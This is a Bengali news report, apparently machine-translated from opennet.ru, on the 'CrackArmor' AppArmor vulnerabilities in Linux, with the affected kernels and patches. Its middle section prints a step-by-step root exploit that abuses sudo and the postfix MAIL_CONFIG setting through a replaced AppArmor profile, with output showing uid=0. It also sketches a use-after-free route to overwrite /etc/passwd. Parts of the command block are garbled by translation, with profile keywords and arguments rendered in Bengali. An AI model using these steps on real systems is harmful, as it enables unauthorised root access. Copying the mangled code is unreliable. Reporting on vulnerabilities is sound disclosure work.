অ্যাপআর্মরের দুর্বলতা যা সিস্টেমে রুট অ্যাক্সেসের অনুমতি দেয়

Qualys AppArmor বাধ্যতামূলক অ্যাক্সেস কন্ট্রোল সিস্টেমে নয়টি দুর্বলতা চিহ্নিত করেছে, যার মধ্যে সবচেয়ে গুরুতর হল স্থানীয়, সুবিধাবঞ্চিত ব্যবহারকারীকে রুট সুবিধা পেতে, বিচ্ছিন্ন কন্টেইনার থেকে বেরিয়ে আসতে এবং AppArmor-প্রয়োগকৃত বিধিনিষেধ বাইপাস করতে দেয়। দুর্বলতাগুলিকে CrackArmor কোডনাম দেওয়া হয়েছে। CVE শনাক্তকারী এখনও বরাদ্দ করা হয়নি। Ubuntu 24.04 এবং Debian 13-তে সফল সুবিধাবঞ্চিত আক্রমণগুলি প্রদর্শিত হয়েছে।

২০১৭ সালে প্রকাশিত Linux কার্নেল ৪.১১ থেকে AppArmor LSM মডিউলে সমস্যা দেখা দিয়েছে এবং Ubuntu, Debian, openSUSE এবং SUSE এর মতো AppArmor ব্যবহারকারী ডিস্ট্রিবিউশনগুলিকে প্রভাবিত করে (openSUSE/SUSE ১৬ দিয়ে শুরু করে, SELinux ডিফল্টরূপে সক্রিয় থাকে, তবে AppArmor এখনও একটি বিকল্প)। দুর্বলতাগুলি সমাধানকারী প্যাচগুলি Linux কার্নেল রক্ষণাবেক্ষণকারীদের কাছে জমা দেওয়া হয়েছে এবং আগামী দিনে 6.18.18, 6.19.8, 6.12.77, 6.6.130, 6.1.167, 5.15.203 এবং 5.10.253 আপডেটের অংশ হিসাবে ব্যবহারকারীদের কাছে প্রকাশ করা হবে। এই সমাধানটি আজকের Ubuntu কার্নেল প্যাকেজ আপডেটেও অন্তর্ভুক্ত রয়েছে। ইতিমধ্যে, উবুন্টু sudo, sudo-ldap, এবং util-linux প্যাকেজগুলির (যার মধ্যে su ইউটিলিটি অন্তর্ভুক্ত) আপডেট প্রকাশ করেছে, যাতে AppArmor দুর্বলতার শোষণের অনুমতি দেওয়া ত্রুটিগুলি সংশোধন করা হয়েছে। ডেবিয়ান একটি আপডেট প্রস্তুত করছে।

সমস্যাগুলি AppArmor-এর একটি মৌলিক "confused-deputy" দুর্বলতার কারণে ঘটে, যা সুবিধাবঞ্চিত ব্যবহারকারীদের ইচ্ছামত AppArmor প্রোফাইল লোড, প্রতিস্থাপন এবং মুছে ফেলার অনুমতি দেয়। এই দুর্বলতা সরাসরি স্থানীয় এবং দূরবর্তী আক্রমণ থেকে প্রোগ্রাম এবং পরিষেবাগুলির সুরক্ষা অক্ষম করতে ব্যবহার করা যেতে পারে (pseudo-files /sys/kernel/security/apparmor/.load, .replace, এবং .remove লিখে, উদাহরণস্বরূপ, cupsd এবং rsyslogd-এ সীমাবদ্ধতা অপসারণ করতে), পরিষেবা অস্বীকারের কারণ হতে পারে (deny প্রোফাইল ব্যবহার করে), এবং নেমস্পেস সীমাবদ্ধতা বাইপাস করতে পারে (একটি নতুন AppArmor প্রোফাইল "userns" লোড করে, উদাহরণস্বরূপ, /usr/bin/time এর জন্য, সীমাহীন ব্যবহারকারীর নামস্থান তৈরির অনুমতি দেয়)।

AppArmor প্রোফাইল প্রতিস্থাপন করার ক্ষমতার মাধ্যমে su এবং sudo-এর মতো বিশেষাধিকারপ্রাপ্ত ইউটিলিটিগুলিতে নতুন প্রোফাইল সংযুক্ত করে রুট প্রিভিলেজ অর্জন করা যায়, যা নির্দিষ্ট কিছু সিস্টেম কলে অ্যাক্সেস ব্লক করে দেয়। বিশেষত, sudo ইউটিলিটির জন্য setuid (CAP_SETUID) অপারেশনটি নিষ্ক্রিয় করার পাশাপাশি মেইল ​​সেটিংস ধারণকারী ডিরেক্টরি পরিবর্তন করার জন্য MAIL_CONFIG এনভায়রনমেন্ট ভেরিয়েবলটি ম্যানিপুলেট করার মাধ্যমে রুট প্রিভিলেজ অর্জন করা যেতে পারে। সার্ভার পোস্টফিক্স।

/usr/sbin/sendmail চালানোর সময় সমস্যা দেখা দিলে এই পদ্ধতিতে sudo ব্যবহার করে অ্যাডমিনিস্ট্রেটরকে ইমেল পাঠানো হয়। বিশেষাধিকার ডাম্পিং নিষ্ক্রিয় করে, এই প্রক্রিয়াটি রুট বিশেষাধিকার দিয়ে চালানো যেতে পারে। sudo চালানোর আগে MAIL_CONFIG পরিবেশ পরিবর্তনশীল সেট করে, আপনি sendmail-এ অন্যান্য সেটিংস পাস করতে পারেন, যার মধ্যে মেইল ​​পাঠানোর সময় চালানোর জন্য একটি কাস্টম পোস্টড্রপ হ্যান্ডলার নির্দিষ্ট করা অন্তর্ভুক্ত। $ mkdir /tmp/postfix $ cat > /tmp/postfix/main.cf << "EOF" command_directory = /tmp/postfix EOF $ cat > /tmp/postfix/postdrop << "EOF" #!/bin/sh /usr/bin/id >> /tmp/postfix/pwned EOF $ chmod -R 0755 /tmp/postfix $ apparmor_parser -K -o sudo.pf << "EOF" /usr/bin/sudo { ফাইলের অনুমতি দিন, সংকেতের অনুমতি দিন, নেটওয়ার্কের অনুমতি দিন, ক্ষমতার অনুমতি দিন, ক্ষমতার অস্বীকার করুন setuid, } EOF $ su -P -c 'stty raw && cat sudo.pf' "$USER" > /sys/kernel/security/apparmor/.replace পাসওয়ার্ড: $ env -i MAIL_CONFIG=/tmp/postfix /usr/bin/sudo যাই হোক না কেন sudo: PERM_SUDOERS: setresuid(-1, 1, -1): অপারেশন অনুমোদিত নয় sudo: /etc/sudoers খুলতে অক্ষম: অপারেশন অনুমোদিত নয় sudo: setresuid() [0, 0, 0] -> [1001, -1, -1]: অপারেশন অনুমোদিত নয় sudo: অডিট প্লাগইন শুরু করার সময় ত্রুটি sudoers_audit $ cat /tmp/postfix/pwned uid=0(root) gid=1001(jane) groups=1001(jane),100(users)

সুবিধা বৃদ্ধির অন্যান্য পদ্ধতির মধ্যে রয়েছে লিনাক্স কার্নেল স্তরে চলমান AppArmor কোডের দুর্বলতা। এটি দেখানো হয়েছে কিভাবে free() ফাংশনের দ্বিগুণ সম্পাদন এবং AppArmor প্রোফাইল লোডিং এবং প্রতিস্থাপন কোডে ইতিমধ্যে-মুক্ত মেমরি (ব্যবহার-পর-মুক্ত) অ্যাক্সেসের ফলে সৃষ্ট দুর্বলতা ব্যবহার করে রুট সুবিধা অর্জন করা যায়। উদাহরণস্বরূপ, AppArmor aa_loaddata কাঠামোতে একটি প্রোফাইল সংরক্ষণ করে, যার জন্য মেমরি kmalloc-192 স্ল্যাব ক্যাশে বরাদ্দ করা হয়। একটি রেস শর্ত এই কাঠামোটি মুক্ত করার পরে দখলকৃত মেমরি অ্যাক্সেস করতে পারে। এই সমস্যাটি মুক্ত মেমরির উপর নিয়ন্ত্রণ অর্জন করতে এবং /etc/passwd ফাইলের বিষয়বস্তু ম্যাপ করার জন্য মুক্ত মেমরি পৃষ্ঠাটি পুনরায় বরাদ্দ করতে এবং রুট পাসওয়ার্ড স্ট্রিং ওভাররাইট করতে কাজে লাগানো যেতে পারে।

উত্স: opennet.ru